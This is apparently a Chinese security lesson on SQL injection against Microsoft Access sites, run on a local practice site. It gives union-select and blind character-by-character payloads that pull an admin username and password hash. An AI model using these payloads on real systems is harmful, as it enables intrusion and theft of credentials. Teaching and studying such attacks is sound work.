第二课SQL注入之access下

• access注入攻击片段-联合查询法

1. 判断注入及猜字段数

' and 1=1 and 1=2

and 1=1  页面正常

and 1=22 页面错误

数学逻辑运算符 或 且 非

or and xor

真且真 真

真且假 假

真或假 真

 

Order by 22

22代表查询的表名的数目

扫描二维码关注公众号，回复： 5002159 查看本文章

 

 

2.猜解表名

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

 

3.猜解列名

union select 1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

4.猜解内容

http://127.0.0.1:81/0/0/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,xxuser_name,4,5,6,7,8,9,10,11,12,13,14,xxpass_word,16,17,18,19,20,21,22 from admin

• access注入工具介绍使用

1. 明小子

2.Sqlmap

3.穿山甲

分析工具的猜解原理

 

 

• access注入攻击片段-逐字猜解法

查表：and exists (select * from admin)

查列：and exists (select xxuser_name from admin)

 

查数据：1.确定长度 2.确定asc数据(asc编码)

and (select top 1 len(xxuser_name) from admin)=5

and (select top 1 asc(mid(xxuser_name,1,1)) from admin)=97 判断第一位

and (select top 1 asc(mid(xxuser_name,2,1)) from admin)=97 判断第二位

xxuser_name 长度为5

Xxpass_word 长度为16

 

xxuser_name=admin 第一位a 第二位d 第三位m 第四位i 第五位n

Xxpass_word=a48e190fafc257d3